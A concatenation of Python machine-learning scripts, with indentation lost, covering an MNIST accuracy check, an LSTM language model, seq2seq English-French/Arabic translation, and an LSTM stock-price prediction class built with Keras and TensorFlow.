for data in test:
X, y = data
output = net(X.view(-1, 28*28))
for index, i in enumerate(output):
if torch.argmax(i) == y[index]:
correct += 1
total += 1
print("Accuracy:", round(correct / total, 3))
# testing
print(torch.argmax(net(X.view(-1, 28*28))[0]))
plt.imshow(X[0].view(28, 28))
plt.show()
from keras.models import Sequential
from keras.layers import LSTM, Dropout, BatchNormalization, LeakyReLU, Dense, Activation, TimeDistributed
from keras.layers import Bidirectional
def rnn_model(input_dim, cell, num_layers, units, dropout, batch_normalization=True, bidirectional=True):
model = Sequential()
for i in range(num_layers):
if i == 0:
# first time, specify input_shape
if bidirectional:
model.add(Bidirectional(cell(units, input_shape=(None, input_dim), return_sequences=True)))
else:
model.add(cell(units, input_shape=(None, input_dim), return_sequences=True))
if batch_normalization:
model.add(BatchNormalization())
model.add(Dropout(dropout))
model.add(LeakyReLU(alpha=0.1))
else:
if bidirectional:
model.add(Bidirectional(cell(units, return_sequences=True)))
else:
model.add(cell(units, return_sequences=True))
if batch_normalization:
model.add(BatchNormalization())
model.add(Dropout(dropout))
model.add(LeakyReLU(alpha=0.1))
model.add(TimeDistributed(Dense(input_dim, activation="softmax")))
return model
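# hypothetical usage sketch (commented out), matching how the training script
# below instantiates this function:
# model = rnn_model(input_dim=50, cell=LSTM, num_layers=4, units=380, dropout=0.3,
#                   bidirectional=False)
# model.compile(loss="categorical_crossentropy", optimizer="adam")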
from utils import UNK, text_to_sequence, sequence_to_text
from keras.preprocessing.sequence import pad_sequences
from keras.layers import LSTM
from models import rnn_model
from scipy.ndimage import shift  # scipy.ndimage.interpolation is deprecated
import numpy as np
# to use CPU
import os
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID" # see issue #152
os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
import tensorflow as tf
config = tf.ConfigProto(intra_op_parallelism_threads=6,
inter_op_parallelism_threads=6,
allow_soft_placement=True,
device_count = {'CPU' : 1,
'GPU' : 0}
)
INPUT_DIM = 50
test_text = ""
test_text += """college or good clerk at university has not pleasant days or used not to have them half a century ago but his position was recognized and the misery was measured can we just make something that is useful for making this happen especially when they are just doing it by"""
encoded = np.expand_dims(np.array(text_to_sequence(test_text)), axis=0)
encoded = encoded.reshape((-1, encoded.shape[0], encoded.shape[1]))
model = rnn_model(INPUT_DIM, LSTM, 4, 380, 0.3, bidirectional=False)
model.load_weights("results/lm_rnn_v2_6400548.3.h5")
# for i in range(10):
# predicted_word_int = model.predict_classes(encoded)[0]
# print(predicted_word_int, end=',')
# word = sequence_to_text(predicted_word_int)
# encoded = shift(encoded, -1, cval=predicted_word_int)
# print(word, end=' ')
print("Fed:")
print(encoded)
print("Result: predict")
print(model.predict(encoded)[0])
print("Result: predict_proba")
print(model.predict_proba(encoded)[0])
print("Result: predict_classes")
print(model.predict_classes(encoded)[0])
print(sequence_to_text(model.predict_classes(encoded)[0]))
print()
from models import rnn_model
from utils import sequence_to_text, text_to_sequence, get_batches, get_data, get_text, vocab
from keras.layers import LSTM
from keras.callbacks import ModelCheckpoint
import numpy as np
import os
INPUT_DIM = 50
# OUTPUT_DIM = len(vocab)
BATCH_SIZE = 128
# get data
text = get_text("data")
encoded = np.array(text_to_sequence(text))
print(len(encoded))
# X, y = get_data(encoded, INPUT_DIM, 1)
# del text, encoded
model = rnn_model(INPUT_DIM, LSTM, 4, 380, 0.3, bidirectional=False)
model.compile(loss="categorical_crossentropy", optimizer="adam", metrics=["accuracy"])
model.summary()
if not os.path.isdir("results"):
os.mkdir("results")
checkpointer = ModelCheckpoint("results/lm_rnn_v2_{loss:.1f}.h5", verbose=1)
steps_per_epoch = (len(encoded) // 100) // BATCH_SIZE
model.fit_generator(get_batches(encoded, BATCH_SIZE, INPUT_DIM),
epochs=100,
callbacks=[checkpointer],
verbose=1,
steps_per_epoch=steps_per_epoch)
model.save("results/lm_rnn_v2_final.h5")
import numpy as np
import os
import tqdm
import inflect
from string import punctuation, whitespace
from word_forms.word_forms import get_word_forms
p = inflect.engine()
UNK = "<unk>"
vocab = set()
add = vocab.add
# add unk
add(UNK)
with open("data/vocab1.txt") as f:
for line in f:
add(line.strip())
vocab = sorted(vocab)
word2int = {w: i for i, w in enumerate(vocab)}
int2word = {i: w for i, w in enumerate(vocab)}
def update_vocab(word):
global vocab
global word2int
global int2word
# vocab is a sorted list at this point (see above), so append instead of set.add
vocab.append(word)
next_int = max(int2word) + 1
word2int[word] = next_int
int2word[next_int] = word
def save_vocab(_vocab):
with open("vocab1.txt", "w") as f:
for w in sorted(_vocab):
print(w, file=f)
def text_to_sequence(text):
return [ word2int[word] for word in text.split() ]
def sequence_to_text(seq):
return ' '.join([ int2word[i] for i in seq ])
def get_batches(arr, batch_size, n_steps):
'''Create a generator that returns batches of size
batch_size x n_steps from arr.
Arguments
---------
arr: Array you want to make batches from
batch_size: Batch size, the number of sequences per batch
n_steps: Number of sequence steps per batch
'''
chars_per_batch = batch_size * n_steps
n_batches = len(arr) // chars_per_batch
arr = arr[:chars_per_batch * n_batches]
arr = arr.reshape((batch_size, -1))
while True:
for n in range(0, arr.shape[1], n_steps):
x = arr[:, n: n+n_steps]
y_temp = arr[:, n+1:n+n_steps+1]
y = np.zeros(x.shape, dtype=y_temp.dtype)
y[:, :y_temp.shape[1]] = y_temp
yield x.reshape(1, x.shape[0], x.shape[1]), y.reshape(1, y.shape[0], y.shape[1])
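# shape sanity check (commented out): with batch_size=2 and n_steps=3 on a
# 12-element array, each yielded x has shape (1, 2, 3) and y is x shifted one
# step forward within each row:
# x, y = next(get_batches(np.arange(12), batch_size=2, n_steps=3))
# print(x.shape, y.shape)  # -> (1, 2, 3) (1, 2, 3)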
def get_data(arr, n_seq, look_forward):
n_samples = len(arr) // n_seq
X = np.zeros((n_seq, n_samples))
Y = np.zeros((n_seq, n_samples))
for index, i in enumerate(range(0, n_samples*n_seq, n_seq)):
x = arr[i:i+n_seq]
y = arr[i+look_forward:i+n_seq+look_forward]
if len(x) != n_seq or len(y) != n_seq:
break
X[:, index] = x
Y[:, index] = y
return X.T.reshape(1, X.shape[1], X.shape[0]), Y.T.reshape(1, Y.shape[1], Y.shape[0])
def get_text(path, files=["carroll-alice.txt", "text.txt", "text8.txt"]):
global vocab
global word2int
global int2word
text = ""
for file in tqdm.tqdm(files, "Loading data"):
file = os.path.join(path, file)
with open(file, encoding="utf8") as f:
text += f.read().lower()
punc = set(punctuation)
text = ''.join([ c for c in tqdm.tqdm(text, "Cleaning text") if c not in punc ])
for ws in whitespace:
text = text.replace(ws, " ")
text = text.split()
co = 0
vocab_set = set(vocab)
for i in tqdm.tqdm(range(len(text)), "Normalizing words"):
# convert digits to words
# (i.e '7' to 'seven')
if text[i].isdigit():
text[i] = p.number_to_words(text[i])
# compare_nouns
# compare_adjs
# compare_verbs
if text[i] not in vocab_set:
text[i] = UNK
co += 1
# update vocab, intersection of words
print("vocab length:", len(vocab))
vocab = vocab_set & set(text)
print("vocab length after update:", len(vocab))
save_vocab(vocab)
print("Number of unks:", co)
return ' '.join(text)
from train import create_model, get_data, split_data, LSTM_UNITS, np, to_categorical, Tokenizer, pad_sequences, pickle
def tokenize(x, tokenizer=None):
"""Tokenize x
:param x: List of sentences/strings to be tokenized
:return: Tuple of (tokenized x data, tokenizer used to tokenize x)"""
if tokenizer:
t = tokenizer
else:
t = Tokenizer()
t.fit_on_texts(x)
return t.texts_to_sequences(x), t
def predict_sequence(enc, dec, source, n_steps, decoder_num_tokens):
"""Generate target given source sequence, this function can be used
after the model is trained to generate a target sequence given a source sequence."""
# encode
state = enc.predict(source)
# start of sequence input
target_seq = np.zeros((1, 1, n_steps))
# collect predictions
output = []
for t in range(n_steps):
# predict next char
yhat, h, c = dec.predict([target_seq] + state)
# store predictions
y = yhat[0, 0, :]
sampled_token_index = np.argmax(y)
output.append(sampled_token_index)
# update state
state = [h, c]
# update target sequence
target_seq = np.zeros((1, 1, n_steps))
target_seq[0, 0] = to_categorical(sampled_token_index, num_classes=n_steps)
return np.array(output)
def logits_to_text(logits, index_to_words):
"""
Turn logits from a neural network into text using the tokenizer
:param logits: Logits from a neural network
:param tokenizer: Keras Tokenizer fit on the labels
:return: String that represents the text of the logits
"""
return ' '.join([index_to_words[prediction] for prediction in logits])
# load the data
X, y, X_tk, y_tk, source_sequence_length, target_sequence_length = get_data("fra.txt")
X_tk = pickle.load(open("X_tk.pickle", "rb"))
y_tk = pickle.load(open("y_tk.pickle", "rb"))
model, enc, dec = create_model(source_sequence_length, target_sequence_length, LSTM_UNITS)
model.load_weights("results/eng_fra_v1_17568.086.h5")
while True:
text = input("> ")
tokenized = np.array(tokenize([text], tokenizer=X_tk)[0])
print(tokenized.shape)
X = pad_sequences(tokenized, maxlen=source_sequence_length, padding="post")
X = X.reshape((1, 1, X.shape[-1]))
print(X.shape)
# X = to_categorical(X, num_classes=len(X_tk.word_index) + 1)
print(X.shape)
sequence = predict_sequence(enc, dec, X, target_sequence_length, source_sequence_length)
result = logits_to_text(sequence, y_tk.index_word)
print(result)
from tensorflow.keras.models import Model, Sequential
from tensorflow.keras.layers import Input, LSTM, GRU, Dense, Embedding, Activation, Dropout, RepeatVector
from tensorflow.keras.layers import TimeDistributed
from tensorflow.keras.preprocessing.text import Tokenizer
from tensorflow.keras.preprocessing.sequence import pad_sequences
from tensorflow.keras.utils import to_categorical, plot_model
from tensorflow.keras.callbacks import ModelCheckpoint, TensorBoard
import numpy as np
import matplotlib.pyplot as plt
import os
import pickle
# hyper parameters
BATCH_SIZE = 32
EPOCHS = 10
LSTM_UNITS = 128
def create_encdec_model(input_shape, output_sequence_length, english_vocab_size, french_vocab_size):
model = Sequential()
model.add(LSTM(LSTM_UNITS, input_shape=input_shape[1:]))
model.add(RepeatVector(output_sequence_length))
model.add(LSTM(LSTM_UNITS, return_sequences=True))
model.add(TimeDistributed(Dense(french_vocab_size, activation="softmax")))
model.compile(loss="sparse_categorical_crossentropy", optimizer="adam", metrics=["categorical_accuracy"])
return model
def create_model(num_encoder_tokens, num_decoder_tokens, latent_dim):
# define an input sequence
encoder_inputs = Input(shape=(None, num_encoder_tokens))
encoder = LSTM(latent_dim, return_state=True)
# define the encoder output
encoder_outputs, state_h, state_c = encoder(encoder_inputs)
encoder_states = [state_h, state_c]
# encoder inference model
encoder_model = Model(encoder_inputs, encoder_states)
# set up the decoder now
decoder_inputs = Input(shape=(None, num_decoder_tokens))
decoder_lstm = LSTM(latent_dim, return_sequences=True, return_state=True)
decoder_outputs, _, _ = decoder_lstm(decoder_inputs, initial_state=encoder_states)
decoder_dense = Dense(num_decoder_tokens, activation="softmax")
decoder_outputs = decoder_dense(decoder_outputs)
# decoder inference model
decoder_state_input_h = Input(shape=(latent_dim,))
decoder_state_input_c = Input(shape=(latent_dim,))
decoder_state_inputs = [decoder_state_input_h, decoder_state_input_c]
model = Model([encoder_inputs, decoder_inputs], decoder_outputs)
decoder_outputs, state_h, state_c = decoder_lstm(decoder_inputs, initial_state=decoder_state_inputs)
decoder_states = [state_h, state_c]
decoder_model = Model([decoder_inputs] + decoder_state_inputs, [decoder_outputs] + decoder_states)
return model, encoder_model, decoder_model
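# hypothetical usage sketch (commented out): the three returned models share
# weights; `model` is trained with teacher forcing, while the encoder/decoder
# halves are used at inference time (see predict_sequence in the prediction
# script above):
# model, enc, dec = create_model(num_encoder_tokens=40, num_decoder_tokens=50, latent_dim=128)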
def get_batches(X, y, X_tk, y_tk, source_sequence_length, target_sequence_length, batch_size=BATCH_SIZE):
# get total number of words in X
num_encoder_tokens = len(X_tk.word_index) + 1
# get max number of words in all sentences in y
num_decoder_tokens = len(y_tk.word_index) + 1
while True:
for j in range(0, len(X), batch_size):
encoder_input_data = X[j: j+batch_size]
decoder_input_data = y[j: j+batch_size]
# redefine batch size
# it may differ (in last batch of dataset)
batch_size = encoder_input_data.shape[0]
# one-hot everything
# decoder_target_data = np.zeros((batch_size, num_decoder_tokens, target_sequence_length), dtype=np.uint8)
# encoder_data = np.zeros((batch_size, source_sequence_length, num_encoder_tokens), dtype=np.uint8)
# decoder_data = np.zeros((batch_size, target_sequence_length, num_decoder_tokens), dtype=np.uint8)
encoder_data = np.expand_dims(encoder_input_data, axis=1)
decoder_data = np.expand_dims(decoder_input_data, axis=1)
# for i, sequence in enumerate(decoder_input_data):
# for t, word_index in enumerate(sequence):
# # skip the first
# if t > 0:
# decoder_target_data[i, t-1, word_index] = 1
# decoder_data[i, t, word_index] = 1
# for i, sequence in enumerate(encoder_input_data):
# for t, word_index in enumerate(sequence):
# encoder_data[i, t, word_index] = 1
yield ([encoder_data, decoder_data], decoder_input_data)
def get_data(file):
X = []
y = []
# loading the data
for line in open(file, encoding="utf-8"):
if "\t" not in line:
continue
# split by tab
line = line.strip().split("\t")
input_text = line[0]
output = line[1]
output = f"{output} <eos>"
output_sentence_input = f"<sos> {output}"  # prepared for decoder input but unused in this script
X.append(input_text)
y.append(output)
# tokenize data
X_tk = Tokenizer()
X_tk.fit_on_texts(X)
X = X_tk.texts_to_sequences(X)
y_tk = Tokenizer()
y_tk.fit_on_texts(y)
y = y_tk.texts_to_sequences(y)
# define the max sequence length for X
source_sequence_length = max(len(x) for x in X)
# define the max sequence length for y
target_sequence_length = max(len(y_) for y_ in y)
# padding sequences
X = pad_sequences(X, maxlen=source_sequence_length, padding="post")
y = pad_sequences(y, maxlen=target_sequence_length, padding="post")
return X, y, X_tk, y_tk, source_sequence_length, target_sequence_length
def shuffle_data(X, y):
"""
Shuffles X & y while preserving their pair order
"""
state = np.random.get_state()
np.random.shuffle(X)
np.random.set_state(state)
np.random.shuffle(y)
return X, y
def split_data(X, y, train_split_rate=0.2):
"""Shuffles then splits X & y; train_split_rate is the fraction kept for training."""
# shuffle first
X, y = shuffle_data(X, y)
training_samples = round(len(X) * train_split_rate)
return X[:training_samples], y[:training_samples], X[training_samples:], y[training_samples:]
if __name__ == "__main__":
# load the data
X, y, X_tk, y_tk, source_sequence_length, target_sequence_length = get_data("fra.txt")
# save tokenizers
pickle.dump(X_tk, open("X_tk.pickle", "wb"))
pickle.dump(y_tk, open("y_tk.pickle", "wb"))
# shuffle & split data
X_train, y_train, X_test, y_test = split_data(X, y)
# construct the models
model, enc, dec = create_model(source_sequence_length, target_sequence_length, LSTM_UNITS)
plot_model(model, to_file="model.png")
plot_model(enc, to_file="enc.png")
plot_model(dec, to_file="dec.png")
model.summary()
model.compile(optimizer="adam", loss="categorical_crossentropy", metrics=["accuracy"])
if not os.path.isdir("results"):
os.mkdir("results")
checkpointer = ModelCheckpoint("results/eng_fra_v1_{val_loss:.3f}.h5", save_best_only=True, verbose=2)
# train the model
model.fit_generator(get_batches(X_train, y_train, X_tk, y_tk, source_sequence_length, target_sequence_length),
validation_data=get_batches(X_test, y_test, X_tk, y_tk, source_sequence_length, target_sequence_length),
epochs=EPOCHS, steps_per_epoch=(len(X_train) // BATCH_SIZE),
validation_steps=(len(X_test) // BATCH_SIZE),
callbacks=[checkpointer])
print("[+] Model trained.")
model.save("results/eng_fra_v1.h5")
print("[+] Model saved.")
from tensorflow.keras.preprocessing.text import Tokenizer
from tensorflow.keras.preprocessing.sequence import pad_sequences
from tensorflow.keras.models import Model, Sequential
from tensorflow.keras.layers import GRU, Input, Dense, TimeDistributed, Activation, RepeatVector, Bidirectional, Flatten
from tensorflow.keras.layers import Dropout, LSTM
from tensorflow.keras.optimizers import Adam
from tensorflow.keras.losses import sparse_categorical_crossentropy
import collections
import numpy as np
LSTM_UNITS = 128
def get_data(file):
X = []
y = []
# loading the data
for line in open(file, encoding="utf-8"):
if "\t" not in line:
continue
# split by tab
line = line.strip().split("\t")
input_text = line[0]
output = line[1]
X.append(input_text)
y.append(output)
return X, y
def create_encdec_model(input_shape, output_sequence_length, english_vocab_size, french_vocab_size):
model = Sequential()
model.add(LSTM(LSTM_UNITS, input_shape=input_shape[1:]))
model.add(RepeatVector(output_sequence_length))
model.add(LSTM(LSTM_UNITS, return_sequences=True))
model.add(TimeDistributed(Dense(french_vocab_size, activation="softmax")))
model.compile(loss="sparse_categorical_crossentropy", optimizer="adam", metrics=["categorical_accuracy"])
return model
def tokenize(x):
"""
Tokenize x
:param x: List of sentences/strings to be tokenized
:return: Tuple of (tokenized x data, tokenizer used to tokenize x)
"""
# TODO: Implement
t = Tokenizer()
t.fit_on_texts(x)
return t.texts_to_sequences(x), t
def pad(x, length=None):
"""
Pad x
:param x: List of sequences.
:param length: Length to pad the sequence to. If None, use length of longest sequence in x.
:return: Padded numpy array of sequences
"""
# TODO: Implement
sequences = pad_sequences(x, maxlen=length, padding='post')
return sequences
def preprocess(x, y):
"""
Preprocess x and y
:param x: Feature List of sentences
:param y: Label List of sentences
:return: Tuple of (Preprocessed x, Preprocessed y, x tokenizer, y tokenizer)
"""
preprocess_x, x_tk = tokenize(x)
preprocess_y, y_tk = tokenize(y)
preprocess_x = pad(preprocess_x)
preprocess_y = pad(preprocess_y)
# Keras's sparse_categorical_crossentropy function requires the labels to be in 3 dimensions
preprocess_y = preprocess_y.reshape(*preprocess_y.shape, 1)
return preprocess_x, preprocess_y, x_tk, y_tk
def logits_to_text(logits, tokenizer):
"""
Turn logits from a neural network into text using the tokenizer
:param logits: Logits from a neural network
:param tokenizer: Keras Tokenizer fit on the labels
:return: String that represents the text of the logits
"""
index_to_words = {id: word for word, id in tokenizer.word_index.items()}
index_to_words[0] = '<PAD>'
return ' '.join([index_to_words[prediction] for prediction in np.argmax(logits, 1)])
if __name__ == "__main__":
X, y = get_data("ara.txt")
english_words = [word for sentence in X for word in sentence.split()]
french_words = [word for sentence in y for word in sentence.split()]
english_words_counter = collections.Counter(english_words)
french_words_counter = collections.Counter(french_words)
print('{} English words.'.format(len(english_words)))
print('{} unique English words.'.format(len(english_words_counter)))
print('10 Most common words in the English dataset:')
print('"' + '" "'.join(list(zip(*english_words_counter.most_common(10)))[0]) + '"')
print()
print('{} French words.'.format(len(french_words)))
print('{} unique French words.'.format(len(french_words_counter)))
print('10 Most common words in the French dataset:')
print('"' + '" "'.join(list(zip(*french_words_counter.most_common(10)))[0]) + '"')
# Tokenize Example output
text_sentences = [
'The quick brown fox jumps over the lazy dog .',
'By Jove , my quick study of lexicography won a prize .',
'This is a short sentence .']
text_tokenized, text_tokenizer = tokenize(text_sentences)
print(text_tokenizer.word_index)
print()
for sample_i, (sent, token_sent) in enumerate(zip(text_sentences, text_tokenized)):
print('Sequence {} in x'.format(sample_i + 1))
print(' Input: {}'.format(sent))
print(' Output: {}'.format(token_sent))
# Pad Tokenized output
test_pad = pad(text_tokenized)
for sample_i, (token_sent, pad_sent) in enumerate(zip(text_tokenized, test_pad)):
print('Sequence {} in x'.format(sample_i + 1))
print(' Input: {}'.format(np.array(token_sent)))
print(' Output: {}'.format(pad_sent))
preproc_english_sentences, preproc_french_sentences, english_tokenizer, french_tokenizer =\
preprocess(X, y)
max_english_sequence_length = preproc_english_sentences.shape[1]
max_french_sequence_length = preproc_french_sentences.shape[1]
english_vocab_size = len(english_tokenizer.word_index)
french_vocab_size = len(french_tokenizer.word_index)
print('Data Preprocessed')
print("Max English sentence length:", max_english_sequence_length)
print("Max French sentence length:", max_french_sequence_length)
print("English vocabulary size:", english_vocab_size)
print("French vocabulary size:", french_vocab_size)
tmp_x = pad(preproc_english_sentences, preproc_french_sentences.shape[1])
tmp_x = tmp_x.reshape((-1, preproc_french_sentences.shape[-2], 1))
print("tmp_x.shape:", tmp_x.shape)
print("preproc_french_sentences.shape:", preproc_french_sentences.shape)
# Train the neural network
# increase the passed vocab sizes by 1 to avoid an index error
encdec_rnn_model = create_encdec_model(
tmp_x.shape,
preproc_french_sentences.shape[1],
len(english_tokenizer.word_index)+1,
len(french_tokenizer.word_index)+1)
print(encdec_rnn_model.summary())
# reduced batch size
encdec_rnn_model.fit(tmp_x, preproc_french_sentences, batch_size=256, epochs=3, validation_split=0.2)
# Print prediction(s)
print(logits_to_text(encdec_rnn_model.predict(tmp_x[1].reshape((1, tmp_x[1].shape[0], 1, )))[0], french_tokenizer))
print("Original text and translation:")
print(X[1])
print(y[1])
# OPTIONAL: Train and Print prediction(s)
print("="*50)
# Print prediction(s)
print(logits_to_text(encdec_rnn_model.predict(tmp_x[10].reshape((1, tmp_x[1].shape[0], 1, )))[0], french_tokenizer))
print("Original text and translation:")
print(X[10])
print(y[10])
# OPTIONAL: Train and Print prediction(s)
from tensorflow.keras.layers import LSTM, Dense, Dropout
from tensorflow.keras.callbacks import ModelCheckpoint, TensorBoard
from sklearn.metrics import mean_absolute_error, mean_squared_error, accuracy_score
import os
import time
import glob
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from utils import classify, shift, create_model, load_data
class PricePrediction:
"""A Class utility to train and predict price of stocks/cryptocurrencies/trades
using keras model"""
def __init__(self, ticker_name, **kwargs):
"""
:param ticker_name (str): ticker name, e.g. aapl, nflx, etc.
:param n_steps (int): sequence length used to predict, default is 60
:param price_column (str): the name of the column that contains the price to predict, default is 'adjclose'
:param feature_columns (list): a list of feature column names used to train the model,
default is ['adjclose', 'volume', 'open', 'high', 'low']
:param target_column (str): target column name, default is 'future'
:param lookup_step (int): the future lookup step to predict, default is 1 (e.g. next day)
:param shuffle (bool): whether to shuffle the dataset, default is True
:param verbose (int): verbosity level, default is 1
==========================================
Model parameters
:param n_layers (int): number of recurrent neural network layers, default is 3
:param cell (keras.layers.RNN): RNN cell used to train keras model, default is LSTM
:param units (int): number of units of cell, default is 256
:param dropout (float): dropout rate ( from 0 to 1 ), default is 0.3
==========================================
Training parameters
:param batch_size (int): number of samples per gradient update, default is 64
:param epochs (int): number of epochs, default is 100
:param optimizer (str, keras.optimizers.Optimizer): optimizer used to train, default is 'adam'
:param loss (str, function): loss function used to minimize during training,
default is 'mae'
:param test_size (float): test size ratio from 0 to 1, default is 0.15
"""
self.ticker_name = ticker_name
self.n_steps = kwargs.get("n_steps", 60)
self.price_column = kwargs.get("price_column", 'adjclose')
self.feature_columns = kwargs.get("feature_columns", ['adjclose', 'volume', 'open', 'high', 'low'])
self.target_column = kwargs.get("target_column", "future")
self.lookup_step = kwargs.get("lookup_step", 1)
self.shuffle = kwargs.get("shuffle", True)
self.verbose = kwargs.get("verbose", 1)
self.n_layers = kwargs.get("n_layers", 3)
self.cell = kwargs.get("cell", LSTM)
self.units = kwargs.get("units", 256)
self.dropout = kwargs.get("dropout", 0.3)
self.batch_size = kwargs.get("batch_size", 64)
self.epochs = kwargs.get("epochs", 100)
self.optimizer = kwargs.get("optimizer", "adam")
self.loss = kwargs.get("loss", "mae")
self.test_size = kwargs.get("test_size", 0.15)
# create unique model name
self._update_model_name()
# runtime attributes
self.model_trained = False
self.data_loaded = False
self.model_created = False
# test price values
self.test_prices = None
# predicted price values for the test set
self.y_pred = None
# prices converted to buy/sell classes
self.classified_y_true = None
# predicted prices converted to buy/sell classes
self.classified_y_pred = None
# most recent price
self.last_price = None
# make folders if they don't exist
if not os.path.isdir("results"):
os.mkdir("results")
if not os.path.isdir("logs"):
os.mkdir("logs")
if not os.path.isdir("data"):
os.mkdir("data")
def create_model(self):
"""Construct and compile the keras model"""
self.model = create_model(input_length=self.n_steps,
units=self.units,
cell=self.cell,
dropout=self.dropout,
n_layers=self.n_layers,
loss=self.loss,
optimizer=self.optimizer)
self.model_created = True
if self.verbose > 0:
print("[+] Model created")
def train(self, override=False):
"""Train the keras model using self.checkpointer and self.tensorboard as keras callbacks.
If model created already trained, this method will load the weights instead of training from scratch.
Note that this method will create the model and load data if not called before."""
# if model isn't created yet, create it
if not self.model_created:
self.create_model()
# if data isn't loaded yet, load it
if not self.data_loaded:
self.load_data()
# if the model already exists and trained, just load the weights and return
# but if override is True, then just skip loading weights
if not override:
model_name = self._model_exists()
if model_name:
self.model.load_weights(model_name)
self.model_trained = True
if self.verbose > 0:
print("[*] Model weights loaded")
return
if not os.path.isdir("results"):
os.mkdir("results")
if not os.path.isdir("logs"):
os.mkdir("logs")
model_filename = self._get_model_filename()
self.checkpointer = ModelCheckpoint(model_filename, save_best_only=True, verbose=1)
self.tensorboard = TensorBoard(log_dir=os.path.join("logs", self.model_name))
self.history = self.model.fit(self.X_train, self.y_train,
batch_size=self.batch_size,
epochs=self.epochs,
validation_data=(self.X_test, self.y_test),
callbacks=[self.checkpointer, self.tensorboard],
verbose=1)
self.model_trained = True
if self.verbose > 0:
print("[+] Model trained")
def predict(self, classify=False):
"""Predicts next price for the step self.lookup_step.
when classify is True, returns 0 for sell and 1 for buy"""
if not self.model_trained:
raise RuntimeError("Model is not trained yet, call model.train() first.")
# reshape to fit the model input
last_sequence = self.last_sequence.reshape((self.last_sequence.shape[1], self.last_sequence.shape[0]))
# expand dimension
last_sequence = np.expand_dims(last_sequence, axis=0)
predicted_price = self.column_scaler[self.price_column].inverse_transform(self.model.predict(last_sequence))[0][0]
if classify:
last_price = self.get_last_price()
return 1 if last_price < predicted_price else 0
else:
return predicted_price
def load_data(self):
"""Loads and preprocess data"""
filename, exists = self._df_exists()
if exists:
# if the updated dataframe already exists in disk, load it
self.ticker = pd.read_csv(filename)
ticker = self.ticker
if self.verbose > 0:
print("[*] Dataframe loaded from disk")
else:
ticker = self.ticker_name
result = load_data(ticker, n_steps=self.n_steps, lookup_step=self.lookup_step,
shuffle=self.shuffle, feature_columns=self.feature_columns,
price_column=self.price_column, test_size=self.test_size)
# extract data
self.df = result['df']
self.X_train = result['X_train']
self.X_test = result['X_test']
self.y_train = result['y_train']
self.y_test = result['y_test']
self.column_scaler = result['column_scaler']
self.last_sequence = result['last_sequence']
if self.shuffle:
self.unshuffled_X_test = result['unshuffled_X_test']
self.unshuffled_y_test = result['unshuffled_y_test']
else:
self.unshuffled_X_test = self.X_test
self.unshuffled_y_test = self.y_test
self.original_X_test = self.unshuffled_X_test.reshape((self.unshuffled_X_test.shape[0], self.unshuffled_X_test.shape[2], -1))
self.data_loaded = True
if self.verbose > 0:
print("[+] Data loaded")
# save the dataframe to disk
self.save_data()
def get_last_price(self):
"""Returns the last price ( i.e the most recent price )"""
if not self.last_price:
self.last_price = float(self.df[self.price_column].tail(1))
return self.last_price
def get_test_prices(self):
"""Returns test prices. Note that this function won't return the whole sequences,
instead, it'll return only the last value of each sequence"""
if self.test_prices is None:
current = np.squeeze(self.column_scaler[self.price_column].inverse_transform([[ v[-1][0] for v in self.original_X_test ]]))
future = np.squeeze(self.column_scaler[self.price_column].inverse_transform(np.expand_dims(self.unshuffled_y_test, axis=0)))
self.test_prices = np.array(list(current) + [future[-1]])
return self.test_prices
def get_y_pred(self):
"""Get predicted values of the testing set of sequences ( y_pred )"""
if not self.model_trained:
raise RuntimeError("Model is not trained yet, call model.train() first.")
if self.y_pred is None:
self.y_pred = np.squeeze(self.column_scaler[self.price_column].inverse_transform(self.model.predict(self.unshuffled_X_test)))
return self.y_pred
def get_y_true(self):
"""Returns original y testing values ( y_true )"""
test_prices = self.get_test_prices()
return test_prices[1:]
def _get_shifted_y_true(self):
"""Returns original y testing values shifted by -1.
This function is useful for converting to a classification problem"""
test_prices = self.get_test_prices()
return test_prices[:-1]
def _calc_classified_prices(self):
"""Convert regression predictions to a classification predictions ( buy or sell )
and set results to self.classified_y_pred for predictions and self.classified_y_true
for true prices"""
if self.classified_y_true is None or self.classified_y_pred is None:
current_prices = self._get_shifted_y_true()
future_prices = self.get_y_true()
predicted_prices = self.get_y_pred()
self.classified_y_true = list(map(classify, current_prices, future_prices))
self.classified_y_pred = list(map(classify, current_prices, predicted_prices))
# some metrics
def get_MAE(self):
"""Calculates the Mean-Absolute-Error metric of the test set"""
if not self.model_trained:
raise RuntimeError("Model is not trained yet, call model.train() first.")
y_true = self.get_y_true()
y_pred = self.get_y_pred()
return mean_absolute_error(y_true, y_pred)
def get_MSE(self):
"""Calculates the Mean-Squared-Error metric of the test set"""
if not self.model_trained:
raise RuntimeError("Model is not trained yet, call model.train() first.")
y_true = self.get_y_true()
y_pred = self.get_y_pred()
return mean_squared_error(y_true, y_pred)
def get_accuracy(self):
"""Calculates the accuracy after adding classification approach (buy/sell)"""
if not self.model_trained:
raise RuntimeError("Model is not trained yet, call model.train() first.")
self._calc_classified_prices()
return accuracy_score(self.classified_y_true, self.classified_y_pred)
def plot_test_set(self):
"""Plots test data"""
future_prices = self.get_y_true()
predicted_prices = self.get_y_pred()
plt.plot(future_prices, c='b')
plt.plot(predicted_prices, c='r')
plt.xlabel("Days")
plt.ylabel("Price")
plt.legend(["Actual Price", "Predicted Price"])
plt.show()
def save_data(self):
"""Saves the updated dataframe if it does not exist"""
filename, exists = self._df_exists()
if not exists:
self.df.to_csv(filename)
if self.verbose > 0:
print("[+] Dataframe saved")
def _update_model_name(self):
stock = self.ticker_name.replace(" ", "_")
feature_columns_str = ''.join([ c[0] for c in self.feature_columns ])
time_now = time.strftime("%Y-%m-%d")
self.model_name = f"{time_now}_{stock}-{feature_columns_str}-loss-{self.loss}-{self.cell.__name__}-seq-{self.n_steps}-step-{self.lookup_step}-layers-{self.n_layers}-units-{self.units}"
def _get_df_name(self):
"""Returns the updated dataframe name"""
time_now = time.strftime("%Y-%m-%d")
return f"data/{self.ticker_name}_{time_now}.csv"
def _df_exists(self):
"""Check if the updated dataframe exists in disk, returns a tuple contains (filename, file_exists)"""
filename = self._get_df_name()
return filename, os.path.isfile(filename)
def _get_model_filename(self):
"""Returns the relative path of this model name with h5 extension"""
return f"results/{self.model_name}.h5"
def _model_exists(self):
"""Checks if model already exists in disk, returns the filename,
returns None otherwise"""
filename = self._get_model_filename()
return filename if os.path.isfile(filename) else None
# uncomment below to use CPU instead of GPU
# import os
# os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID" # see issue #152
# os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
